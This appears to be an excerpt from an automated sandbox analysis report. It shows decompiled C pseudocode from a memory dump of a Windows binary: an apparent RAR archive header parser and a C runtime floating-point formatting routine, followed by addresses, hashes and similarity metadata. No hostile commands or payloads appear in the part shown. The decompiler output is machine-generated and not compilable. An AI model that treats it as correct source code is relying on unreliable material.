									 *(_t394 + 0x6cb7) = _t501 >> 0x00000004 & 1;
									_t431 = 1;
									 *((char*)(_t394 + 0x6cba)) = 1;
									 *(_t394 + 0x6cbb) = _t501 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t394 + 0x6cb8)) = 0;
									__eflags = _t501 & 0x00000002;
									if((_t501 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = E00D7C39E(_t501);
										_t270 = 0;
										_t431 = 1;
									}
									__eflags =  *(_t394 + 0x6cb5);
									if( *(_t394 + 0x6cb5) == 0) {
										L81:
										_t431 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t394 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t394 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t394 + 0x6cb9)) = _t431;
											_t432 =  *(_t544 + 0x58);
											__eflags = _t432 |  *(_t544 + 0x54);
											if((_t432 |  *(_t544 + 0x54)) != 0) {
												E00D7200C(_t394, _t544 + 0x30, _t432, _t394 + 0x2208);
											}
											L84:
											 *(_t544 + 0x60) =  *(_t544 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t500 - 3;
								if(_t500 <= 3) {
									__eflags = _t500 - 2;
									_t120 = (0 | _t500 != 0x00000002) - 1; // -1
									_t517 = (_t120 & 0xffffdcb0) + 0x45d0 + _t394;
									 *(_t544 + 0x2c) = _t517;
									E00D7A8D2(_t517, 0);
									_t437 = 5;
									memcpy(_t517, _t394 + 0x21e4, _t437 << 2);
									_t539 =  *(_t544 + 0x2c);
									 *(_t544 + 0x60) =  *(_t394 + 0x21e8);
									 *(_t539 + 0x1058) =  *(_t544 + 0x64);
									 *((char*)(_t539 + 0x10f9)) = 1;
									 *(_t539 + 0x105c) =  *(_t544 + 0x5c);
									 *(_t539 + 0x1094) = E00D7C39E(_t500);
									 *(_t539 + 0x1060) = E00D7C39E(_t500);
									_t289 =  *(_t539 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t539 + 0x1064) = _t500;
									 *(_t539 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t539 + 0x1060) = 0x7fffffff;
										 *(_t539 + 0x1064) = 0x7fffffff;
									}
									_t441 =  *(_t539 + 0x105c);
									_t520 =  *(_t539 + 0x1064);
									_t290 =  *(_t539 + 0x1058);
									_t502 =  *(_t539 + 0x1060);
									__eflags = _t441 - _t520;
									if(__eflags < 0) {
										L51:
										_t290 = _t502;
										_t441 = _t520;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t539 + 0x106c) = _t441;
											 *(_t539 + 0x1068) = _t290;
											_t291 = E00D7C39E(_t502);
											__eflags =  *(_t539 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t539 + 0x24)) = _t291;
											if(( *(_t539 + 0x1094) & 0x00000002) != 0) {
												E00D80A25(_t539 + 0x1040, _t502, E00D7C29E(_t544 + 0x30), 0);
											}
											 *(_t539 + 0x1070) =  *(_t539 + 0x1070) & 0x00000000;
											__eflags =  *(_t539 + 0x1094) & 0x00000004;
											if(( *(_t539 + 0x1094) & 0x00000004) != 0) {
												 *(_t539 + 0x1070) = 2;
												 *((intOrPtr*)(_t539 + 0x1074)) = E00D7C29E(_t544 + 0x30);
											}
											 *(_t539 + 0x1100) =  *(_t539 + 0x1100) & 0x00000000;
											_t292 = E00D7C39E(_t502);
											 *(_t544 + 0x64) = _t292;
											 *(_t539 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t449 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t539 + 0x1c)) = _t449;
											__eflags = _t449 - 0x32;
											if(_t449 != 0x32) {
												 *((intOrPtr*)(_t539 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t539 + 0x18)) = E00D7C39E(_t502);
											_t521 = E00D7C39E(_t502);
											 *(_t539 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t539 + 0x18));
											 *(_t539 + 0x10f8) =  *(_t394 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t539 + 0x10fc;
													 *_t177 =  *(_t539 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t539 + 0x10fc) = 1;
											}
											_t455 =  *(_t539 + 8);
											 *(_t539 + 0x1098) = _t455 >> 0x00000003 & 1;
											 *(_t539 + 0x10fa) = _t455 >> 0x00000005 & 1;
											__eflags =  *(_t544 + 0x60) - 2;
											_t458 =  *(_t544 + 0x64);
											 *(_t539 + 0x1099) = _t455 >> 0x00000004 & 1;
											if( *(_t544 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t458 & 0x00000040;
												if((_t458 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t539 + 0x10f0)) = _t302;
												_t304 =  *(_t539 + 0x1094) & 1;
												 *(_t539 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t539 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t458 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t539 + 0x109c) =  ~( *(_t539 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t521 - 0x1fff;
												if(_t521 >= 0x1fff) {
													_t521 = 0x1fff;
												}
												E00D7C300(_t544 + 0x30, _t544 - 0x2074, _t521);
												 *((char*)(_t544 + _t521 - 0x2074)) = 0;
												_push(0x800);
												_t522 = _t539 + 0x28;
												_push(_t539 + 0x28);
												_push(_t544 - 0x2074);
												E00D81094();
												_t462 =  *(_t544 + 0x58);
												__eflags = _t462 |  *(_t544 + 0x54);
												if((_t462 |  *(_t544 + 0x54)) != 0) {
													E00D7200C(_t394, _t544 + 0x30, _t462, _t539);
												}
												_t319 =  *(_t544 + 0x60);
												__eflags =  *(_t544 + 0x60) - 2;
												if( *(_t544 + 0x60) != 2) {
													L72:
													_t320 = E00D92B69(_t319, _t522, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t394 + 0x6cb6)) = 1;
													}
													goto L74;
												} else {
													E00D71F3D(_t394, _t539);
													_t319 =  *(_t544 + 0x60);
													__eflags =  *(_t544 + 0x60) - 2;
													if( *(_t544 + 0x60) == 2) {
														L74:
														__eflags =  *(_t544 + 0x6b);
														if(__eflags != 0) {
															E00D76BF5(__eflags, 0x1c, _t394 + 0x1e, _t522);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t502;
										if(_t290 > _t502) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t500 - 4;
								if(_t500 == 4) {
									_t470 = 5;
									memcpy(_t394 + 0x2248, _t394 + 0x21e4, _t470 << 2);
									_t331 = E00D7C39E(_t500);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t394 + 0x225c) = E00D7C39E(_t500) & 0x00000001;
										_t335 = E00D7C251(_t544 + 0x30) & 0x000000ff;
										 *(_t394 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E00D7C300(_t544 + 0x30, _t394 + 0x2264, 0x10);
											__eflags =  *(_t394 + 0x225c);
											if( *(_t394 + 0x225c) != 0) {
												E00D7C300(_t544 + 0x30, _t394 + 0x2274, 8);
												E00D7C300(_t544 + 0x30, _t544 + 0x64, 4);
												E00D7F524(_t544 - 0x74);
												E00D7F56A(_t544 - 0x74, _t394 + 0x2274, 8);
												_push(_t544 + 8);
												E00D7F435(_t544 - 0x74);
												_t350 = E00D8F3CA(_t544 + 0x64, _t544 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t394 + 0x225c) = _t352;
											}
											 *((char*)(_t394 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t544);
										E00D73E41();
										E00D73DEC(_t394, _t394 + 0x1e, _t544);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t500 - 5;
								if(_t500 == 5) {
									_t479 = _t500;
									memcpy(_t394 + 0x4590, _t394 + 0x21e4, _t479 << 2);
									 *(_t394 + 0x45ac) = E00D7C39E(_t500) & 0x00000001;
									 *((short*)(_t394 + 0x45ae)) = 0;
									 *((char*)(_t394 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t484 = E00D7C39E(_t498);
							 *(_t544 + 0x54) = _t498;
							_t256 = 0;
							 *(_t544 + 0x58) = _t484;
							__eflags = _t498;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t484 -  *(_t394 + 0x21f0);
							if(_t484 >=  *(_t394 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E00D71EF8(_t394);
						 *((char*)(_t394 + 0x6cc4)) = 1;
						E00D76E03(0xdb00e0, 3);
						__eflags =  *((char*)(_t544 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E00D76BF5(__eflags, 4, _t394 + 0x1e, _t394 + 0x1e);
							 *((char*)(_t394 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E00D73DAB(_t394, _t498);
					goto L86;
				}
				_t498 =  *((intOrPtr*)(_t394 + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t556 =  *((intOrPtr*)(_t394 + 0x6ca4));
				if(_t556 < 0 || _t556 <= 0 &&  *((intOrPtr*)(_t394 + 0x6ca0)) <= _t498) {
					goto L15;
				} else {
					_push(0x10);
					_push(_t544 + 0x18);
					 *((char*)(_t544 + 0x6a)) = 1;
					if( *((intOrPtr*)( *_t394 + 0xc))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t544 + 0x6b) = 1;
						L8:
						E00D73C40(_t394);
						_t529 = _t394 + 0x2264;
						_t543 = _t394 + 0x1024;
						E00D7607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t394 + 0x2264, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
						if( *(_t394 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t544 + 0x50)) = _t543;
							goto L16;
						} else {
							_t378 = _t394 + 0x2274;
							while(1) {
								_t380 = E00D8F3CA(_t544 + 0x28, _t378, 8);
								_t546 = _t546 + 0xc;
								if(_t380 == 0) {
									goto L13;
								}
								_t563 =  *(_t544 + 0x6b);
								_t381 = _t394 + 0x1e;
								_push(_t381);
								_push(_t381);
								if( *(_t544 + 0x6b) != 0) {
									_push(6);
									E00D76BF5(__eflags);
									 *((char*)(_t394 + 0x6cc5)) = 1;
									E00D76E03(0xdb00e0, 0xb);
									goto L86;
								}
								_push(0x7d);
								E00D76BF5(_t563);
								E00D7E797( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024);
								E00D73C40(_t394);
								E00D7607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t529, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
								_t378 = _t394 + 0x2274;
								if( *(_t394 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t392 = E00D80FBA();
					 *(_t544 + 0x6b) = 0;
					if(_t392 == 0) {
						goto L8;
					}
					goto L7;
				}
			}





























































              0x00d730fc
              0x00d730fd
              0x00d73105
              0x00d7310f
              0x00d73116
              0x00d7311d
              0x00d73124
              0x00d73127
              0x00d73130
              0x00d73279
              0x00d73279
              0x00d7327c
              0x00d73289
              0x00d7329a
              0x00d732a1
              0x00d732b1
              0x00d732bb
              0x00d732bd
              0x00d732c4
              0x00d732c6
              0x00d738f6
              0x00d738f8
              0x00d738fd
              0x00d73900
              0x00d7390e
              0x00d73919
              0x00d73919
              0x00d732cc
              0x00d732ce
              0x00000000
              0x00000000
              0x00d732d4
              0x00d732da
              0x00d732dc
              0x00d732dc
              0x00d732de
              0x00d732e1
              0x00000000
              0x00000000
              0x00d732e7
              0x00d732ea
              0x00000000
              0x00000000
              0x00d732f4
              0x00d732f9
              0x00d732fc
              0x00000000
              0x00000000
              0x00d73301
              0x00d73313
              0x00d73319
              0x00d7331e
              0x00d73329
              0x00d7332b
              0x00d73334
              0x00d7333a
              0x00d73340
              0x00d73346
              0x00d73349
              0x00d7334c
              0x00d7334e
              0x00d73388
              0x00d73388
              0x00d7338a
              0x00d73391
              0x00d73394
              0x00d73397
              0x00d733c1
              0x00d733c1
              0x00d733c8
              0x00d733ca
              0x00d733cd
              0x00d733d0
              0x00d733d5
              0x00d733da
              0x00d733dc
              0x00d733df
              0x00d733df
              0x00d733ea
              0x00d733f7
              0x00d73406
              0x00d7340f
              0x00d73417
              0x00d7341e
              0x00d73424
              0x00d73426
              0x00d73837
              0x00d73846
              0x00d73847
              0x00d73851
              0x00d7385a
              0x00d73867
              0x00d73876
              0x00d73881
              0x00d73884
              0x00d7388a
              0x00d73890
              0x00d73892
              0x00d73898
              0x00d7389b
              0x00d738b2
              0x00d7389d
              0x00d738a5
              0x00d738ad
              0x00d738af
              0x00d738af
              0x00d738b8
              0x00d738bf
              0x00d738c9
              0x00d738c9
              0x00000000
              0x00d738c1
              0x00d738c1
              0x00d738c7
              0x00d738cb
              0x00d738cb
              0x00d738d1
              0x00d738d6
              0x00d738d9
              0x00d738e9
              0x00d738e9
              0x00d738ee
              0x00d738f1
              0x00000000
              0x00d738f1
              0x00000000
              0x00d738c7
              0x00d738bf
              0x00d7342c
              0x00000000
              0x00000000
              0x00d73432
              0x00d73435
              0x00d73577
              0x00d7357f
              0x00d7358e
              0x00d73592
              0x00d73595
              0x00d7359c
              0x00d735a3
              0x00d735ae
              0x00d735b1
              0x00d735b7
              0x00d735c0
              0x00d735c7
              0x00d735d5
              0x00d735e0
              0x00d735ef
              0x00d735ef
              0x00d735f1
              0x00d735f7
              0x00d735fd
              0x00d73604
              0x00d7360a
              0x00d7360a
              0x00d73610
              0x00d73616
              0x00d7361c
              0x00d73622
              0x00d73628
              0x00d7362a
              0x00d73632
              0x00d73632
              0x00d73634
              0x00000000
              0x00d7362c
              0x00d7362c
              0x00d73636
              0x00d73636
              0x00d7363f
              0x00d73645
              0x00d7364a
              0x00d73651
              0x00d73654
              0x00d73667
              0x00d73667
              0x00d7366c
              0x00d73673
              0x00d7367a
              0x00d7367f
              0x00d7368e
              0x00d7368e
              0x00d73694
              0x00d7369e
              0x00d736a5
              0x00d736ae
              0x00d736b6
              0x00d736b9
              0x00d736bc
              0x00d736bf
              0x00d736c1
              0x00d736c1
              0x00d736d3
              0x00d736e7
              0x00d736e9
              0x00d736f3
              0x00d736f8
              0x00d736fe
              0x00d73700
              0x00d7370a
              0x00d7370c
              0x00d7370e
              0x00d7370e
              0x00d7370e
              0x00d7370e
              0x00d73702
              0x00d73702
              0x00d73702
              0x00d73715
              0x00d7371f
              0x00d73731
              0x00d73737
              0x00d7373b
              0x00d7373e
              0x00d73744
              0x00d7374f
              0x00d7374f
              0x00d7374f
              0x00000000
              0x00d73746
              0x00d73746
              0x00d73749
              0x00000000
              0x00000000
              0x00d7374b
              0x00d73751
              0x00d73751
              0x00d7375d
              0x00d73762
              0x00d73777
              0x00d7377d
              0x00d7378c
              0x00d73791
              0x00d7379c
              0x00d7379e
              0x00d737a0
              0x00d737a0
              0x00d737ad
              0x00d737b2
              0x00d737c0
              0x00d737c5
              0x00d737c8
              0x00d737c9
              0x00d737ca
              0x00d737cf
              0x00d737d4
              0x00d737d7
              0x00d737e1
              0x00d737e1
              0x00d737e6
              0x00d737e9
              0x00d737ec
              0x00d737fe
              0x00d73804
              0x00d7380b
              0x00d7380d
              0x00d7380f
              0x00d7380f
              0x00000000
              0x00d737ee
              0x00d737f1
              0x00d737f6
              0x00d737f9
              0x00d737fc
              0x00d73816
              0x00d73816
              0x00d7381a
              0x00d73827
              0x00d73827
              0x00000000
              0x00d7381a
              0x00000000
              0x00d737fc
              0x00d737ec
              0x00d73744
              0x00d7362e
              0x00d73630
              0x00000000
              0x00000000
              0x00000000
              0x00d73630
              0x00d7362a
              0x00d7343b
              0x00d7343e
              0x00d7347f
              0x00d7348c
              0x00d73491
              0x00d73496
              0x00d73498
              0x00d734cf
              0x00d734da
              0x00d734dd
              0x00d734e3
              0x00d734e6
              0x00d734fc
              0x00d73501
              0x00d73508
              0x00d73516
              0x00d73524
              0x00d7352d
              0x00d73539
              0x00d73541
              0x00d73546
              0x00d73555
              0x00d7355f
              0x00d73561
              0x00d73561
              0x00d73563
              0x00d73563
              0x00d73569
              0x00000000
              0x00d73569
              0x00d734e8
              0x00d734e9
              0x00d734a0
              0x00d734a3
              0x00d734a5
              0x00d734a6
              0x00d734b8
              0x00000000
              0x00d734b8
              0x00d7349a
              0x00d7349b
              0x00000000
              0x00d7349b
              0x00d73440
              0x00d73443
              0x00d7344a
              0x00d73457
              0x00d73463
              0x00d7346b
              0x00d73472
              0x00d73472
              0x00000000
              0x00d73443
              0x00d733a1
              0x00d733a3
              0x00d733a6
              0x00d733a8
              0x00d733ab
              0x00d733ad
              0x00000000
              0x00000000
              0x00d733af
              0x00000000
              0x00000000
              0x00d733b5
              0x00d733bb
              0x00000000
              0x00000000
              0x00000000
              0x00d733bb
              0x00d73352
              0x00d7335e
              0x00d73365
              0x00d7336a
              0x00d7336e
              0x00000000
              0x00d73370
              0x00d73377
              0x00d7337c
              0x00000000
              0x00d7337c
              0x00d7336e
              0x00d7328b
              0x00d7328d
              0x00000000
              0x00d7328d
              0x00d7313e
              0x00d73141
              0x00d73143
              0x00d73149
              0x00000000
              0x00d7315d
              0x00d73162
              0x00d73164
              0x00d73167
              0x00d73171
              0x00000000
              0x00000000
              0x00d73184
              0x00d73193
              0x00d73193
              0x00d73197
              0x00d73199
              0x00d731b5
              0x00d731c1
              0x00d731cd
              0x00d731d9
              0x00d73255
              0x00d73255
              0x00000000
              0x00d731db
              0x00d731db
              0x00d731e1
              0x00d731e8
              0x00d731ed
              0x00d731f2
              0x00000000
              0x00000000
              0x00d731f4
              0x00d731f8
              0x00d731fb
              0x00d731fc
              0x00d731fd
              0x00d7325a
              0x00d7325c
              0x00d73268
              0x00d7326f
              0x00000000
              0x00d7326f
              0x00d731ff
              0x00d73201
              0x00d73212
              0x00d73219
              0x00d73241
              0x00d7324d
              0x00d73253
              0x00000000
              0x00000000
              0x00000000
              0x00d73253
              0x00000000
              0x00d731e1
              0x00d731d9
              0x00d73186
              0x00d7318b
              0x00d73191
              0x00000000
              0x00000000
              0x00000000
              0x00d73191

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog_memcmp
              • String ID: CMT$h%u$hc%u
              • API String ID: 3004599000-3282847064
              • Opcode ID: f03e3e5973e20c0053c72312746c8e1d594363e9415baebda1a21aeee60f2e6e
              • Instruction ID: 91510d786e07056c723ff97fe3d710eca3071f0fc90b013c93a3a8480c3f28c3
              • Opcode Fuzzy Hash: f03e3e5973e20c0053c72312746c8e1d594363e9415baebda1a21aeee60f2e6e
              • Instruction Fuzzy Hash: 6932A2715142849FDF18DF64C885AEA37A5EF55300F48857EFD4E8B282EB30AA48DB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9C55E, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 68%
              			E00D9C55E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				signed int _t790;
				intOrPtr _t792;
				void* _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t825;
				signed int _t826;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t841;
				signed int _t849;
				signed int* _t852;
				signed int _t856;
				signed int _t867;
				signed int _t868;
				signed int _t870;
				char* _t871;
				signed int _t874;
				signed int _t878;
				signed int _t879;
				signed int _t884;
				signed int _t886;
				signed int _t891;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t913;
				signed int _t926;
				signed int _t927;
				signed int _t929;
				char* _t930;
				signed int _t933;
				signed int _t937;
				signed int _t938;
				signed int* _t940;
				signed int _t943;
				signed int _t945;
				signed int _t950;
				signed int _t958;
				signed int _t961;
				signed int _t965;
				signed int* _t972;
				intOrPtr _t974;
				void* _t975;
				intOrPtr* _t977;
				signed int* _t981;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1012;
				signed int _t1017;
				signed int _t1020;
				unsigned int _t1023;
				signed int _t1024;
				void* _t1027;
				signed int _t1028;
				void* _t1030;
				signed int _t1031;
				signed int _t1032;
				signed int _t1033;
				signed int _t1038;
				signed int* _t1043;
				signed int _t1045;
				signed int _t1055;
				void _t1058;
				signed int _t1061;
				void* _t1064;
				void* _t1071;
				signed int _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1090;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				unsigned int _t1111;
				void* _t1114;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int* _t1123;
				void* _t1127;
				void* _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1134;
				signed int _t1135;
				signed int _t1140;
				void* _t1142;
				signed int _t1143;
				signed int _t1146;
				char _t1151;
				signed int _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				unsigned int _t1170;
				void* _t1174;
				void* _t1175;
				unsigned int _t1176;
				signed int _t1181;
				signed int _t1182;
				signed int _t1184;
				signed int _t1185;
				intOrPtr* _t1187;
				signed int _t1188;
				signed int _t1190;
				signed int _t1191;
				signed int _t1194;
				signed int _t1196;
				signed int _t1197;
				void* _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				void* _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int* _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				intOrPtr* _t1218;
				intOrPtr* _t1219;
				signed int _t1221;
				signed int _t1223;
				signed int _t1226;
				signed int _t1232;
				signed int _t1236;
				signed int _t1237;
				signed int _t1242;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1260;
				signed int _t1261;
				signed int _t1263;
				signed int _t1264;
				signed int _t1266;
				signed int _t1268;
				signed int _t1270;
				signed int _t1273;
				signed int _t1275;
				signed int* _t1276;
				signed int* _t1279;
				signed int _t1288;

				_t1142 = __edx;
				_t1273 = _t1275;
				_t1276 = _t1275 - 0x964;
				_t743 =  *0xdad668; // 0x9e43e7e4
				_v8 = _t743 ^ _t1273;
				_t1055 = _a20;
				_push(__esi);
				_push(__edi);
				_t1187 = _a16;
				_v1924 = _t1187;
				_v1920 = _t1055;
				E00D9C078( &_v1944, __eflags);
				_t1236 = _a8;
				_t748 = 0x2d;
				if((_t1236 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1187 = _t748;
				 *((intOrPtr*)(_t1187 + 8)) = _t1055;
				_t1188 = _a4;
				if((_t1236 & 0x7ff00000) != 0) {
					L5:
					_t753 = E00D986BF( &_a4);
					_pop(_t1070);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1070 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t777 = _t754 - 1;
						__eflags = _t777;
						if(_t777 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t778 = _t777 - 1;
							__eflags = _t778;
							if(_t778 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t778 == 1;
								if(_t778 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1188;
									_a8 = _t1236 & 0x7fffffff;
									_t1288 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1190 = _v1896;
									_v1916 = _a12 + 1;
									_t1077 = _t1190 >> 0x14;
									_t784 = _t1077 & 0x000007ff;
									__eflags = _t784;
									if(_t784 != 0) {
										_t1143 = 0;
										_t784 = 0;
										__eflags = 0;
									} else {
										_t1143 = 1;
									}
									_t1191 = _t1190 & 0x000fffff;
									_t1058 = _v1900 + _t784;
									asm("adc edi, esi");
									__eflags = _t1143;
									_t1078 = _t1077 & 0x000007ff;
									_t1242 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
									_v1872 = _t1242;
									E00D9E0C0(_t1078, _t1288);
									_push(_t1078);
									_push(_t1078);
									 *_t1276 = _t1288;
									_t790 = E00DA0F10(E00D9E1D0(_t1191, _t1242), _t1288);
									_v1904 = _t790;
									__eflags = _t790 - 0x7fffffff;
									if(_t790 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t790 - 0x80000000;
										if(_t790 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1058;
									__eflags = _t1191;
									_v464 = _t1191;
									_t1061 = (0 | _t1191 != 0x00000000) + 1;
									_v472 = _t1061;
									__eflags = _t1242;
									if(_t1242 < 0) {
										__eflags = _t1242 - 0xfffffc02;
										if(_t1242 == 0xfffffc02) {
											L101:
											_t792 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1081 = 0;
												__eflags = 0;
											} else {
												_t1081 = _t792 + 1;
											}
											_t793 = 0x20;
											_t794 = _t793 - _t1081;
											__eflags = _t794 - 1;
											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
											__eflags = _t1061 - 0x73;
											_v1865 = _t795;
											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
											__eflags = _t1061 - 0x73;
											if(_t1061 != 0x73) {
												L107:
												_t796 = 0;
												__eflags = 0;
											} else {
												__eflags = _t795;
												if(_t795 == 0) {
													goto L107;
												} else {
													_t796 = 1;
												}
											}
											__eflags = _t1082;
											if(_t1082 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E00D9AA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t796;
												if(_t796 != 0) {
													goto L126;
												} else {
													_t1109 = 0x72;
													__eflags = _t1061 - _t1109;
													if(_t1061 < _t1109) {
														_t1109 = _t1061;
													}
													__eflags = _t1109 - 0xffffffff;
													if(_t1109 != 0xffffffff) {
